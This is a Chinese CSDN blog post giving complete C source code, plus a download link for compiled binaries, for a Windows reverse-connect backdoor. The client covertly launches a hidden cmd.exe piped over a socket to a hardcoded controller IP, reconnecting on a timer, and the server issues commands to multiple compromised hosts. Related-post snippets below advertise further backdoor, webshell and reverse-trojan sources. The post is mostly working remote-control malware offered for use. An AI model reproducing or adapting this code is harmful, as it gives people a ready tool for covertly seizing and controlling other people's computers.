反弹后门的实现(附源代码及编译好的程序,免费下载)

最新推荐文章于 2024-05-15 21:26:16 发布
最新推荐文章于 2024-05-15 21:26:16 发布
阅读量664 收藏 1
点赞数
文章标签: 木马 反弹后门 远程控制 CS架构 黑客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39423611/article/details/100638737
版权

反弹后门是什么

https://www.freebuf.com/articles/web/166732.html

源代码及编译好的程序

https://pan.baidu.com/s/1fQvRbt8UKO3ol5_cZrAGnw

源代码

client

#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")

#define DEST_PORT	1500                            /* 服务器端口 */
#define DEST_IP		"192.168.111.53"                /*服务器IP*/
#define MAX_DATA	1024                             
#define FAIL_TIME 60000//服务器未开启时,本机每隔1分钟尝试连接一次
#define SUCCESS_TIME 600000	//成功连接服务器,10分钟后重新连接

int main()
{
	SOCKET			sock;
	struct sockaddr_in	dest_addr;              /*目标地址信息*/
	char			buf[MAX_DATA] = { 0 };  /* 接收数据缓冲区 */
	WSADATA			wsaData;

	dest_addr.sin_family		= AF_INET;
	dest_addr.sin_port		= htons( DEST_PORT );
	dest_addr.sin_addr.s_addr	= inet_addr( DEST_IP );
	memset( &(dest_addr.sin_zero), 0, 8 );
	
	if ( WSAStartup( MAKEWORD( 2, 2 ), &wsaData ) ) /*socket编程必须先初始化*/
	{
		printf( "WSAStartup failed\n" );
		exit( 0 );
	}

	/* 启动信息,创建进程要用到 */
	STARTUPINFO si;
	ZeroMemory( &si, sizeof(si) );
	si.dwFlags	= STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
	si.wShowWindow	= SW_HIDE;//隐藏cmd.exe窗口


	char cmdLine[256] = { 0 };
	GetSystemDirectory( cmdLine, sizeof(cmdLine) );
	strcat( cmdLine, ("\\cmd.exe") );//获取cmd.exe的绝对路径

	PROCESS_INFORMATION ProcessInformation;/* 程序信息,创建进程要用到 */
	
while(1){//根据服务器是否在线,设定不同的时间循环尝试连接
	
	sock = WSASocket( AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0 );
	if ( sock == -1 )
	{
		printf( "socket failed:%d", WSAGetLastError() );
	}
	
	si.hStdInput	= (void *) sock;//重定向cmd.exe的输入为socket,以接收服务器发来的指令
	si.hStdOutput	= si.hStdError = (void *) sock;//重定向cmd.exe的输出为socket,以发送执行结果给服务器

	if ( connect( sock, (struct sockaddr *) &dest_addr, sizeof(struct sockaddr) ) != -1 )   /* 尝试连接服务器 */
	{	printf( "connect success\n" );
		if ( CreateProcess( cmdLine, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &ProcessInformation ) == 0 )printf( "cmd fail\n" );
		//连接成功则打开cmd.exe
		Sleep(SUCCESS_TIME);//本进程休眠一段时间,这段时间由cmd.exe和服务器交互
		TerminateProcess(ProcessInformation.hProcess,1);//为了避免服务器退出后cmd.exe一直等待,所以一段时间后要强行结束以再次连接
		
 		if(sock!=INVALID_SOCKET)//结束cmd进程后关闭socket
		{
		closesocket(sock);
		sock = INVALID_SOCKET;
		} 
	} else{//连接失败
		
		switch (WSAGetLastError())
		{
		case 10061://服务器不在线
		printf( "connect failed\n");
		break;
		
		default://其他原因
		printf( "连接失败,错误码:%d\n",WSAGetLastError());
		}
		Sleep(FAIL_TIME);
	}
}

	return(0);
}

server

#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib,"ws2_32.lib")

#define PORT	1500                                                                    /* 端口号 */
#define BACKLOG 10                                                                       /*最大连接数*/
#define MAX_DATA	1024  
#define KILL_TIME 61000          //结束ThreadFunc线程的时间               
typedef struct _Threadv
{
	SOCKET* new_sock;
	SOCKET sock;
	struct sockaddr_in* ptheir_addr;
	int* psin_size;
}Threadv;


void print(char *cmdstr)//实现去除执行结果中的 "命令\n"
{
	while(*((char*)cmdstr++)!='\n');
	printf(cmdstr);
}

void ThreadFunc(Threadv* ptv)//输出被控机的IP和端口
{	int i=0;

	while ( ((*ptv).new_sock[i] = accept( (*ptv).sock, (struct sockaddr *)(*ptv).ptheir_addr, (*ptv).psin_size )) != -1){
		if(!getpeername((*ptv).new_sock[i], (struct sockaddr *)(*ptv).ptheir_addr, (*ptv).psin_size))
		{
		printf( "IP:%s\n", inet_ntoa((*(*ptv).ptheir_addr).sin_addr));
		printf( "PORT:%d\n", ntohs((*(*ptv).ptheir_addr).sin_port));
		}
		i++;
	}
} 

int main()
{
	SOCKET			sock, new_sock[BACKLOG]={0};                                           /*socket句柄和建立连接后的句柄数组*/
	struct sockaddr_in	my_addr;                                                /*本方地址信息*/
	struct sockaddr_in	their_addr;                                             /*对方地址信息*/
	int			sin_size = sizeof(struct sockaddr_in);
	int socknum=0;//遍历new_sock数组
	WSADATA			wsaData;
	char			buf[MAX_DATA] = { 0 };  /* 接收数据缓冲区 */
    char 			sendBuff[MAX_DATA] = { 0 };//发送数据缓冲区
	char ch;//接收输入命令字符的变量
	void* hThread ;//线程句柄,输出被控机IP及端口后结束此线程
	unsigned long ThreadID;//作为存放线程ID的容器,暂时未用到
	Threadv tv;//传递给线程的参数
	my_addr.sin_family	= AF_INET;                                              
	my_addr.sin_port	= htons( PORT );                                        /*本机端口*/
	my_addr.sin_addr.s_addr = htonl( INADDR_ANY );                                  /*本机IP*/
	memset( &(my_addr.sin_zero), 0, 8 );                                            /*将其他属性置0*/

	if ( WSAStartup( MAKEWORD( 2, 2 ), &wsaData ) )                                 /*socket编程必须先初始化*/
	{
		printf( "WSAStartup failed:%d\n", WSAGetLastError()  );
		return(-1);
	}

	if ( (sock = socket( AF_INET, SOCK_STREAM, 0 ) ) == -1 )                        /* 建立socket */
	{
		printf( "socket failed:%d\n", WSAGetLastError() );
		return(-1);
	}

	if ( bind( sock, (struct sockaddr *) &my_addr, sizeof(struct sockaddr) ) < 0 )  /* 绑定地址结构体和socket */
	{
		printf( "bind failed:%d\n", WSAGetLastError() );
		return(-1);
	}
	listen( sock, BACKLOG );                                                        /* 开启监听*/
	
	tv.new_sock=new_sock;
	tv.sock=sock;
	tv.ptheir_addr=&their_addr;
	tv.psin_size=&sin_size;
	
	hThread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)ThreadFunc,&tv,0,&ThreadID);//把新建立的socket放入new_sock数组,并输出被控机的IP和端口
	Sleep(KILL_TIME);//这里的时间要根据客户端循环检测的时间定,假如客户端在连接失败时隔60秒再进行连接,那么这里的时间就要大于60秒,以保证所有客户端能连接到服务器
	if(!TerminateThread(hThread,1))printf( "结束线程失败,错误码:%d\n",WSAGetLastError());//等所有客户端连接后结束此线程

	while(new_sock[socknum]!=0){//用来清除被控机中的cmd窗口输出的初始化信息,如:Microsoft Windows [版本 6.1.7601]版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
		recv( new_sock[socknum], buf, MAX_DATA, 0 );
		socknum++;
	}
	ZeroMemory(buf,1024);
	printf( "请输入命令,格式:索引 命令\n");//比如:0 echo a 是指new_sock数组中索引为0的socket对应的被控机在cmd.exe窗口执行echo a命令
	while ( 1 )//循环获取输入以执行命令
	{
		while(1){
			int count=0;
			while((ch=getchar())!='\n')
			{	
				sendBuff[count]=ch;
				count++;
			}
			sendBuff[count++]='\n';	

			send( new_sock[sendBuff[0]-'0'], sendBuff+2, count-2, 0 );//sendBuff是字符数组,所以sendBuff[0]是字符不是数字,要减去'0'转化为数字;索引和空格占用2个字节,所以起始地址为sendBuff+2, 准备发送的字节数为count-2

			Sleep(500);//等待被控机执行命令
			recv( new_sock[sendBuff[0]-'0'], buf, MAX_DATA, 0 ); //获取执行结果                                                /* 将接收数据写入buf,参数分别是句柄,储存处,最大长度,其他信息(设为0即可)。 */
			print( buf );
			ZeroMemory(buf,1024);
			ZeroMemory(sendBuff,1024);
		}	
	}
return(0);
}
StackOverflowZZZ
关注
著名后门nameless源代码NameLess BackDoor V1.14(稳定版)
09-14
著名后门nameless的源代码 可以自己修改 虽然有点老 但是思路还是很值得借鉴的
五个反弹后门源代码[转]
02-01 1790
第一个反弹木马代码:作者 iceblood代码#include #include #include #include #include #include #include void usage();char shell[]="/bin/sh";char message[]="s8s8 welcome/n";int sock;int main(int argc, char *argv[]) {if(
端口反弹工具lcx代码
kimqcn的专栏
01-11 965
#include #include #include #pragma comment(lib, "ws2_32.lib")#define SERVERNAME "itrusPorter"#define VERSION "v1.2"#define MAXBUFSIZE 8192#define ADDRSIZE 32struct SOCKINFO{ SOCKET ClientSock;
攻击技术研判|部署杀软驱动终止AVEDR进程
xnxqwzy的博客
08-19 116
作为杀毒软件却成为恶意软件的刀刃,值得我们反思杀毒软件的驱动在功能实现上是否足够安全,是否也有其他驱动有沦为攻击者的武器的可能性。从内核层发起的攻击对宿主机而言更加难以防御,更具攻击性。勒索软件在绕过安全机制的创新和想法上也是不断增加和进步,值得我们借鉴和学习。杀毒软件却成为恶意软件的刀刃,值得我们反思杀毒软件的驱动在功能实现上是否足够安全,是否也有其他驱动有沦为攻击者的武器的可能性。从内核层发起的攻击对宿主机而言更加难以防御,更具攻击性。
服务器被渗透过程及后门源码
热门推荐
Kenny的专栏
06-27 1万+
今天收到阿里云警报短信,发现服务器被人拿去做肉鸡做DDOS攻击了,跑了几个G的流量,早晨赶紧上线检查下: 发现是别人在tomcat上面上传了后门程序,怎么会被上传呢,发现webapps目录下竟然有个war包,那肯定是通过tomcat自带的manager上传的,manager的账户密码太过于简单,直接被人跑字典跑出来了,汗。。赶紧改下密码。 当然啦,别人的后门程序源码作为福利给大家看下,其实挺
基于Utilities.dll实现C#软件后门程序代码
03-17
内容索引:C#源码,菜单窗体,后门 你知道C#如何给自己的软件加后门吗?本程序将告诉大家一个方法,使用第三方函数库Utilities.dll来构建一个后门系统。 后门系统一般是使用软件彩蛋,一般以按键后门最为常见。
新型ASP后门源代码分析
10-31
本篇文章将对新型ASP后门源代码进行深入分析,以帮助读者更好地理解 ASP 后门的工作原理和检测方法。 一、ASP 后门简介 ASP 后门是一种恶意代码,旨在通过 Web 应用程序来控制感染的计算机。它们通常通过 Exploit ...
3389后门自己造VC源代码
03-15
标题中的“3389后门自己造VC源代码”指的是使用Microsoft Visual C++(VC)编程环境,利用MFC(Microsoft Foundation Classes)库来创建一个针对Windows远程桌面服务(通常通过端口3389访问)的后门程序。...
打造自己的VNC后门生成器VC源代码
03-15
5. **VC/MFC源代码**:MFC(Microsoft Foundation Classes)是微软提供的一套C++类库,用于构建Windows应用程序。在VNC后门生成器中,MFC可以用来创建用户友好的图形界面,方便用户输入参数和生成定制化的后门。 6....
完整B/S后门开发实战VC源代码
03-15
4. **后门隐藏技巧**:了解如何在代码中隐藏后门,使其不易被反编译或静态分析工具发现。 5. **安全加密**:学习如何使用SSL/TLS等加密技术,保护后门通信不被窃听。 6. **逆向工程与调试**:理解如何通过逆向工程来...
后门程序制作示例+源码
03-08
程序后门制作程序后门制作程序后门制作程序后门制作
经典反向后门源代码(可用)vc++6.0反弹木马
12-14
经典反向后门源代码(可用)vc++6.0反弹木马
php网站后门获取最高权限整套源码
08-05
有一天突然收到阿里的通知,网站被人通过webshell攻击留下后门,顺藤摸瓜于是我把他上传到我网站的整套后门代码下载下来了。经测试,把这套代码随便上传到php站点,访问wait.php文件就能拥有最高权限。发出来不是让你们搞破坏的,是希望警醒各位。仅供学习。
Java WebServer 自动部署后门工具和源码
weixin_34220963的博客
01-13 137
社区发现有人发了一个Jboss的自动部署war的后门求此后门的利用方法。挺聪明的Server一般都提供了自动部署服务,也就是说只需要把war包放到默认能够自动部署的目录就行了。POST提交:http://xxx.com/xxx.jsp参数:pUBYyDsT=war文件的Basr64编码&oAEICWIo=Test然后请求http://xxx.com/Test就gets...
src挖掘之Tomcat未授权弱口令+war后门上传
huangyongkang666的博客
07-18 3428
高危src挖掘
Tomcat弱口令及war包漏洞复现(保姆级教程)
m0_69043895的博客
04-21 1954
这里我们采用针对同一弱口令去爆破不同账号的方式进行猜解,将可能存在的username放入position1的位置,其次放置password在position3的位置,最后attack时爆破的顺序如下图,就不会针对同一账号锁定。CSDN上有个脚本利用的是占满tomcat缓存的方式绕过,当同一账号大于5次登录,就会采用脏数据去进行登录,直到缓存占满后,又会用剩下的可能存在的username进行登录。链接的地址是 /zip文件的前缀/文件名,比如我这里就是http://IP/shell/shell.jsp。
Python 渗透测试:反弹 shell (反弹 后门 || 程序免杀)
最新发布
网络安全领域___专研者.
05-15 2273
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3291
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
后门程序BDoor及源码
05-02 1338
提交时间:2005-04-22提交用户:ffantasyYD工具分类:后门程序运行平台:Windows工具大小:316825 Bytes文件MD5 :95e120d97967a3679dfdbd82985ea1ca工具来源:http://www.uestc.edu.cn/web/default.aspx这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值